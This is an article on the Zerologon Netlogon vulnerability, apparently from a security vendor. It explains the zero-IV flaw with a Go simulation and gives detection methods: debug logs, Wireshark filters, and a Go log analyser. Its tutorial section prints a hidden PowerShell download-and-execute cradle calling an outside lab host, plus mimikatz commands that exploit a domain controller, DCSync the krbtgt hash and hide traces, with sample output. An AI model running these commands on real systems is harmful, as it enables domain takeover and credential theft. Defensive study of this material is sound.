Zerologon Exploit Attack
On September 11, 2020, researchers at Secura announced a new vulnerability they named Zerologon. Zerologon enables an unauthenticated attacker to remotely escalate their privileges to Domain Admin, with network access to a domain controller as the only requirement. Every organization running Active Directory was vulnerable to this exploit.
Zerologon exploits an insecure implementation of encryption in the Netlogon Remote Protocol. The researchers discovered that the ComputeNetLogonCredential function utilized a null (all zeros) initialization vector (IV) for the AES algorithm operating in 8-bit cipher feedback mode. When operating in this mode, reusing the same IV leaks information about the plaintext password and is considered insecure.
In normal operation, the weak IV implementation isn't noticeable, but the researchers found that about 1 in 256 authentications with an all-zero plaintext password and an all-zero IV produced an all-zero ciphertext. This means that once an attacker has network access to a domain controller, they can brute-force their way onto the domain controller in about 256 attempts — which takes only 2–3 seconds. Any account lockout policy that might be in place is irrelevant because it applies only to user accounts.
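To see why the fixed IV is the flaw, the following added Go example (written for this page; it is not code from the original article or from Secura) implements AES-CFB8 by hand, checks it against the NIST SP 800-38A CFB8-AES128 test vector, and then counts how often an all-zero 8-byte input encrypts to an all-zero output under random session keys with a zero IV versus a random IV. The simplified model (a fresh random 16-byte session key per attempt, the 8-byte challenge as the plaintext) is an assumption of the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/rand"
	"encoding/hex"
	"fmt"
)

// aesCFB8Encrypt implements AES in 8-bit cipher feedback mode (CFB8).
// Go's crypto/cipher only provides CFB128, so the 8-bit segment variant used
// by ComputeNetLogonCredential is written out here: for each plaintext byte,
// encrypt the 16-byte shift register, XOR the first keystream byte into the
// plaintext byte, then shift that ciphertext byte into the register.
func aesCFB8Encrypt(key, iv, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	reg := make([]byte, aes.BlockSize)
	copy(reg, iv)
	ks := make([]byte, aes.BlockSize)
	out := make([]byte, len(plaintext))
	for i, p := range plaintext {
		block.Encrypt(ks, reg)
		c := p ^ ks[0]
		out[i] = c
		copy(reg, reg[1:])
		reg[aes.BlockSize-1] = c
	}
	return out, nil
}

// knownAnswerOK checks the implementation against the CFB8-AES128 vector from
// NIST SP 800-38A (F.3.7), so the statistics below describe the mode itself
// and not a bug in this code.
func knownAnswerOK() bool {
	key, _ := hex.DecodeString("2b7e151628aed2a6abf7158809cf4f3c")
	iv, _ := hex.DecodeString("000102030405060708090a0b0c0d0e0f")
	pt, _ := hex.DecodeString("6bc1bee22e409f96e93d7e117393172aae2d")
	want, _ := hex.DecodeString("3b79424c9c0dd436bace9e0ed4586a4f32b9")
	got, err := aesCFB8Encrypt(key, iv, pt)
	return err == nil && bytes.Equal(got, want)
}

// credentialIsAllZero models one handshake: an 8-byte challenge of all zeros
// is encrypted as CFB8(sessionKey, iv, challenge). With a zero IV the output
// is all zeros exactly when AES(key, 0^16)[0] == 0: a zero ciphertext byte is
// shifted into an all-zero register, so every later byte sees the same
// keystream byte. The probability is therefore 1/256 per session key, no
// matter how long the credential is.
func credentialIsAllZero(sessionKey, iv []byte) bool {
	challenge := make([]byte, 8)
	cred, err := aesCFB8Encrypt(sessionKey, iv, challenge)
	if err != nil {
		panic(err)
	}
	return bytes.Equal(cred, challenge)
}

// allZeroFraction samples `trials` random session keys (assumed model) and
// reports how often the all-zero challenge yields an all-zero credential.
// zeroIV selects the Netlogon behaviour (fixed zero IV); otherwise a fresh
// random IV is drawn for every attempt.
func allZeroFraction(trials int, zeroIV bool) float64 {
	hits := 0
	key := make([]byte, 16)
	iv := make([]byte, aes.BlockSize)
	for i := 0; i < trials; i++ {
		if _, err := rand.Read(key); err != nil {
			panic(err)
		}
		if zeroIV {
			for j := range iv {
				iv[j] = 0
			}
		} else if _, err := rand.Read(iv); err != nil {
			panic(err)
		}
		if credentialIsAllZero(key, iv) {
			hits++
		}
	}
	return float64(hits) / float64(trials)
}

func main() {
	fmt.Println("known-answer test passed:", knownAnswerOK())
	fmt.Printf("zero IV:   fraction of keys giving an all-zero credential = %.5f (expected ~%.5f)\n",
		allZeroFraction(50000, true), 1.0/256)
	fmt.Printf("random IV: fraction of keys giving an all-zero credential = %.5f\n",
		allZeroFraction(50000, false))
}
```

The contrast is the whole point of the fix: with a random IV the first keystream byte no longer depends only on the key, so an all-zero output needs every one of the eight bytes to come out zero, which is a 2^-64 event rather than a 2^-8 one.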
Attack Tutorial: How the Zerologon Attack Works
Code:
# Non-Encoded Command
powershell -Sta -Nop -Window Hidden -Command "iex (New-Object Net.WebClient).DownloadString('http://sbl-kali2/ps-listener')"
# Encoded Command
powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBiAGwALQBrAGEAbABpADIALwBwAHMALQBsAGkAcwB0AGUAbgBlAHIAJwApAA
Code:
PowerShell /powershellcommand:"[DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select Name, OSVersion"
Code:
Mimikatz.exe "Lsadump::zerologon /target:sbl-basalt2 /account:sbl-basalt2$ /exploit"
Output:
mimikatz # lsadump::zerologon /target:sbl-basalt2 /account:sbl-basalt2$ /exploit /null
Remote : sbl-basalt2
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: yes
Target : sbl-basalt2
Account: sbl-basalt2$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
======================================================================================================================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
The adversary can now use this computer account (and the privileges assigned to it) to further compromise Active Directory. For example, they can use these credentials to conduct a DCSync attack to replicate the KRBTGT password hash and mint Golden Tickets. Afterward, the adversary can cover their tracks by running the lsadump::postzerologon command to restore the domain controller to operational status.
Code:
lsadump::dcsync /domain:basalt.igneous.stealthbitslab.com /dc:sbl-basalt2 /user:ba\krbtgt /authuser:sbl-basalt2$ /authdomain:ba /authpassword:"" /authntlm
lsadump::postzerologon /target:10.154.202.2 /account:sbl-basalt2$ /null
Output:
mimikatz # lsadump::dcsync /domain:basalt.igneous.stealthbitslab.com /dc:sbl-basalt2 /user:ba\krbtgt /authuser:sbl-basalt2$ /authdomain:ba /authpassword:"" /authntlm
[DC] 'basalt.igneous.stealthbitslab.com' will be the domain
[DC] 'sbl-basalt2' will be the DC server
[DC] 'ba\krbtgt' will be the user account
[AUTH] Username: sbl-basalt2$
[AUTH] Domain : ba
[AUTH] Password:
[AUTH] Explicit NTLM Mode
--- Output Truncated ---
Credentials:
Hash NTLM: 75557a32b7c51e11361ab752eb9720da
ntlm- 0: 75557a32b7c51e11361ab752eb9720da
lm - 0: cf591b998a49fa934e3fb0dde45c75ff
--- Output Truncated ---
Credentials
aes256_hmac (4096) : 13d99f13f9f984b8af7779f97e9b096897b7d79653369c46dddc9fb6b17c806b
aes128_hmac (4096) : 97605fe38f43efdf348dc16a75acb265
des_cbc_md5 (4096) : c1f7e989dfbcf4fb
--- Output Truncated ---
mimikatz # lsadump::postzerologon /target:10.154.202.2 /account:sbl-basalt2$ /null
Procedure to update AD domain password and its local stored password remotely
mimic `netdom resetpwd`, experimental & best situation after reboot
Target : 10.154.202.2
Account: sbl-basalt2$
* SAM information
Domain name : BA
Domain SID : S-1-5-21-792045605-1560570832-3988794325
User RID : 1122
> Password updated (to FlipFl0p2020)
* Computer stored password
> Password updated (to FlipFl0p2020)
Detect, Mitigate and Respond
- Netlogon service debug logs
- Packet capturing
- Offensive tooling to check for current or past empty passwords
Detection using Netlogon Debug Logs
Netlogon debug logging is very useful for troubleshooting many types of issues in an Active Directory environment — including finding signs of attempted or successful Zerologon exploitation. However, Netlogon debug logs are not enabled by default. Running the command nltest /DBFlag:20000300 will enable logging of critical error and session setup events. Attempts to exploit the Zerologon vulnerability are evidenced by multiple NetrServerAuthenticate messages from the same host in the same second which result in Bad password. This activity can also be used to detect attempts to exploit the vulnerability against domain controllers that have been patched.
11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$
If the target domain controller is vulnerable, an eventual success message will also be found:
11/10 11:26:48 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: mimikatz on account sbl-basalt2$ (Negot: 212fffff)
Executing mimikatz (Step 3 above) resets the domain controller's computer account password to a null value. This is evidenced by a NetpServerPasswordSet call to reset the password to a null value. This null value can be readily detected by searching for the string d98c1dd4 04b2008f 980980e9 7e42f8ec, which is the MD5 hash of the null password.
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Entered
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Changing password locally
11/10 11:43:49 [SESSION] [2272] Setting Password of 'sbl-basalt2$' to: d98c1dd4 04b2008f 980980e9 7e42f8ec ..............B~
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ returns 0x0
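The three indicators above (a burst of Bad password events from one host within one second, a subsequent Success from that host, and a NetpServerPasswordSet to the null-password hash) can be checked mechanically. The Go program below is an added example, not part of the original article or of any Microsoft tooling; it parses the debug-log line formats shown above, derives the null-password marker from MD5 of the empty string (the log prints the digest as four little-endian 32-bit words, which is why it reads d98c1dd4 rather than the familiar d41d8cd9), and runs the checks over a constructed log. The burst threshold of 10 events per second per client and the host names in the sample are assumptions.

```go
package main

import (
	"crypto/md5"
	"fmt"
	"regexp"
	"strings"
)

// Finding is one detection raised over the Netlogon debug log.
type Finding struct {
	Kind    string // "auth-burst", "auth-success-after-burst", "null-password-set"
	When    string
	Client  string
	Account string
}

// burstThreshold is an assumed tuning value: this many "Bad password"
// NetrServerAuthenticate events from one client in one second are treated as
// a Netlogon credential brute-force. The article only says "multiple".
const burstThreshold = 10

var (
	badPwRe   = regexp.MustCompile(`^(\d\d/\d\d \d\d:\d\d:\d\d) \[CRITICAL\] \[\d+\] \S+ NetrServerAuthenticate: Bad password \d+ for (\S+) on account (\S+)$`)
	successRe = regexp.MustCompile(`^(\d\d/\d\d \d\d:\d\d:\d\d) \[SESSION\] \[\d+\] \S+ NetrServerAuthenticate returns Success: (\S+) on account (\S+)`)
	setPwRe   = regexp.MustCompile(`^(\d\d/\d\d \d\d:\d\d:\d\d) \[SESSION\] \[\d+\] Setting Password of '([^']+)' to: ([0-9a-f]{8} [0-9a-f]{8} [0-9a-f]{8} [0-9a-f]{8})`)
)

// NullPasswordMarker derives the string that marks a reset to an empty
// password: MD5("") rendered as four little-endian 32-bit words.
func NullPasswordMarker() string {
	sum := md5.Sum(nil) // MD5 of the empty input
	words := make([]string, 0, 4)
	for i := 0; i < 16; i += 4 {
		words = append(words, fmt.Sprintf("%02x%02x%02x%02x", sum[i+3], sum[i+2], sum[i+1], sum[i]))
	}
	return strings.Join(words, " ")
}

// AnalyzeNetlogonLog applies the three checks to a debug log and returns the
// findings in the order they are raised.
func AnalyzeNetlogonLog(log string) []Finding {
	var findings []Finding
	bursts := map[string]int{}        // "timestamp|client" -> Bad password count
	burstClients := map[string]bool{} // clients that already produced a burst
	marker := NullPasswordMarker()
	for _, line := range strings.Split(log, "\n") {
		line = strings.TrimSpace(line)
		if m := badPwRe.FindStringSubmatch(line); m != nil {
			key := m[1] + "|" + m[2]
			bursts[key]++
			if bursts[key] == burstThreshold { // raise once per burst
				burstClients[m[2]] = true
				findings = append(findings, Finding{"auth-burst", m[1], m[2], m[3]})
			}
			continue
		}
		if m := successRe.FindStringSubmatch(line); m != nil && burstClients[m[2]] {
			findings = append(findings, Finding{"auth-success-after-burst", m[1], m[2], m[3]})
			continue
		}
		if m := setPwRe.FindStringSubmatch(line); m != nil && m[3] == marker {
			findings = append(findings, Finding{"null-password-set", m[1], "", m[2]})
		}
	}
	return findings
}

// SampleLog is a constructed log in the format shown in the article: a
// 12-attempt burst from the host "mimikatz", a success, the null-password
// reset, plus one benign failed authentication from "WS01" that must not alert.
func SampleLog() string {
	var b strings.Builder
	for i := 0; i < 12; i++ {
		fmt.Fprintf(&b, "11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password %d for mimikatz on account sbl-basalt2$\n", i)
	}
	b.WriteString("11/10 11:26:48 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: mimikatz on account sbl-basalt2$ (Negot: 212fffff)\n")
	b.WriteString("11/10 11:30:02 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for WS01 on account WS01$\n")
	b.WriteString("11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Entered\n")
	b.WriteString("11/10 11:43:49 [SESSION] [2272] Setting Password of 'sbl-basalt2$' to: d98c1dd4 04b2008f 980980e9 7e42f8ec ..............B~\n")
	b.WriteString("11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ returns 0x0\n")
	return b.String()
}

func main() {
	for _, f := range AnalyzeNetlogonLog(SampleLog()) {
		fmt.Printf("%-25s at %s client=%q account=%s\n", f.Kind, f.When, f.Client, f.Account)
	}
}
```

Keying the burst counter on the whole timestamp string is deliberate: the debug log only has one-second resolution, and the brute-force completes within that window, so a per-second bucket is exactly the grouping the text describes. On a patched domain controller the burst still appears but the Success and null-password lines do not, which is the difference between an attempt and a compromise.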
Detection using Network Packet Captures
Network monitoring can also be used to detect attempts to exploit the Zerologon vulnerability. Monitor Netlogon traffic for the NetrServerAuthenticate2 operation where the client credential is all zeros. For example, in Wireshark, the display filter
netlogon.opnum == 15 && netlogon.clientcred == 00:00:00:00:00:00:00:00
will show this traffic. If exploitation is successful, then a packet will exist where the client credential is all zeros but the authentication return code is Status_Success (0x00000000). The Wireshark display filter to find this traffic is
netlogon.opnum == 15 && netlogon.rc == 0x00000000 && netlogon.clientcred == 00:00:00:00:00:00:00:00
Detection using Offensive Tooling
This strategy is particularly useful if you suspect that domain controllers may have been compromised in the recent past and an adversary has covered their tracks. Because this approach uses offensive tooling, it's important to get the right approvals before attempting it. You can use tools like mimikatz and the DCSync technique to replicate domain controller computer account password hashes from Active Directory. This will show all the stored hashes for the computer account up to the maximum specified by the Enforce Password History setting in the password policy; check for a current or previous hash of 31d6cfe0d16ae931b73c59d7e0c089c0, which is the NTLM hash for an empty password.
If any domain controllers still operate on an unsupported (and therefore unpatched) version of Windows (2008R2 and below), isolate them and make plans to upgrade or replace them. If technical requirements prevent upgrading to supported versions, separate domains should be used for these legacy systems.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.